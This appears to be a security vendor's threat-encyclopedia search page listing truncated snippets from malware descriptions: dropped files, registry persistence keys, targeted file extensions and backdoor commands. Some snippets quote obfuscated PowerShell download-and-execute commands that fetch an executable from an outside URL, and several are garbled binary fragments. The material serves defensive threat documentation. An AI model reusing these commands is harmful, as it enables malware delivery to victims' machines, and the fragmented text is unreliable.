Search
Keyword: h
creates the following folders: {drive}\Photo where {drive} can be any of the following: D E F G H I J K L M NOTES: The following sites contain the configuration data where this Trojan downloads an arbitrary
Temp%\CMSTP.inf It adds the following processes: %Public%\peee.com http://www.j.mp/akd{BLOCKED} powershell.exe -w h -NoProfile -ExecutionPolicy Bypass -Command (New-Object IO.StreamReader(
\H PÈÔÆL¦Ó(Ö%LÖË2
LܯÕ(@ P¨QU0Ò¦Ô(TT4ܾÌUT¨QU°_CHAR(0x12)_F$ÐÀÎW6IY²_CHAR(0x13)_Þ_CHAR(0x07)_EÐÐH´Z´¬ÅÌR`_CHAR(0x10)__CHAR(0x08)_Â_CHAR(0x0C)_ÆÙL&_CHAR(0x13)_UÊÀP¸\R$ÞÔR`P¨Ì_CHAR
psd pps ppt pptx xlr xls xlsx doc docx pdf rtf txt wks wps py jar c class cpp cs h swift mp3 wav avi mp4 mkv zip tar.gz tar It appends the following extension to the file name of the encrypted files:
capablities: can steal files with the following file extensions: dll exe jar jpg jpeg png bmp gif ico html htm xml php cpp c h docx txt 7z rar zip others - specified by the user steal in the following
following files: %Windows%\h (Note: %Windows% is the Windows folder, which is usually C:\Windows or C:\WINNT.) Other Details This Trojan connects to the following possibly malicious URL: http://{BLOCKED
HKEY_CURRENT_USER\Software\{1MEC8KH9-170957-GTLJ8R-GTLJ8RO9WI}\ log\6/23/2019 It adds the following registry entries: HKEY_CURRENT_USER\Software\{1MEC8KH9-170957-GTLJ8R-GTLJ8RO9WI} H = "NzkuMTM0LjIyNS4xMTY6NDk0Nyw=
spyware drops the following files: %User Temp%\aut1.tmp %User Temp%\h %User Temp%\aut5.tmp %User Temp%\incl1 %User Temp%\aut9.tmp %User Temp%\incl2 (Note: %User Temp% is the user's temporary folder, where
file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Installation This Trojan adds the following processes: cmd.exe /C "p^o^weRs^H^ell.e^xE^ -^EXeCUt
POwersheLl.^exe^ -eX^ec^uti^oN^P^olIc^Y ^ByPa^ss ^-n^oProfi^l^e -wiNdowstYle h^i^d^d^en ^(^New-O^B^je^ct sYs^tem.N^e^t.webcL^i^e^N^t^).downL^O^adfi^l^e(^'http://mail.archaicknights.com/2uzaqt.exe','%User
\LOG01\explorer %System Root%\LOG01\windows %System Root%\[«ñà[Á] [Âlîñ] [1110071836] Administrator %System Root%\[«ñà[Á] [Âlîñ] [1110071836] Administrator\[h %System Root%\[«ñ
execution at every system startup: HKEY_CURRENT_USER\Software\Microsoft\ Windows\CurrentVersion\Run j AZNb h = "%User Profile%\Application Data\CWS12D007Wilbert.exe" Other System Modifications This Trojan
\3D2C9BEA4369C4E343C8F9A11D57D4E6\b %System%\3D2C9BEA4369C4E343C8F9A11D57D4E6\h (Note: %System% is the Windows system folder, which is usually C:\Windows\System on Windows 98 and ME, C:\WINNT\System32 on Windows NT and 2000, or C:
HKEY_CURRENT_USER\Software\VB and VBA Program Settings\ Microzoft\9ACCBD2F0B4F90F865BFCBDC6AD81C78BAECA887 Exacutible = "xÏåp~§H±?" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\policies\ Explorer\Run
\D9DC14E5BA2AB834C0233642EB51301C\b\ %System%\D9DC14E5BA2AB834C0233642EB51301C\h\ (Note: %System% is the Windows system folder, which is usually C:\Windows\System on Windows 98 and ME, C:\WINNT\System32 on Windows NT and 2000, or C:
HKEY_CURRENT_USER\Software\VB and VBA Program Settings\ Microzoft\9ACCBD2F0B4F90F865BFCBDC6AD81C78BAECA887 Exacutible = "xÏåp~§H±?" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\policies\ Explorer\Run
(0x1B)_¯Æ®_CHAR(0x0F)_æd['æ0_CHAR(0x1D)_åºÅéÀ_CHAR(0x12)__CHAR(0x05)_kH-_CHAR(0x04)_¶ ó_CHAR(0x11)_;y×h·óÂðÇ._CHAR(0x10)__CHAR(0x17)_l+òöËq~V_CHAR(0x0B)_QG4ëXTák\²11_CHAR(0x1D)_Së½uûMÆ. þ
\0FDE2059F84931776D441E1607638CEC\b\ %System%\0FDE2059F84931776D441E1607638CEC\h\ (Note: %System% is the Windows system folder, which is usually C:\Windows\System on Windows 98 and ME, C:\WINNT\System32 on Windows NT and 2000, or C:
\7EE48F195381C49B94A1E5FB24085282\b %System%\7EE48F195381C49B94A1E5FB24085282\h (Note: %System% is the Windows system folder, which is usually C:\Windows\System on Windows 98 and ME, C:\WINNT\System32 on Windows NT and 2000, or C:
prints requested data B - prints file list C - read buffer D - write buffer E - delete file F - write to client G - creates file with random data H - lists files in directory and subdirectories otherwise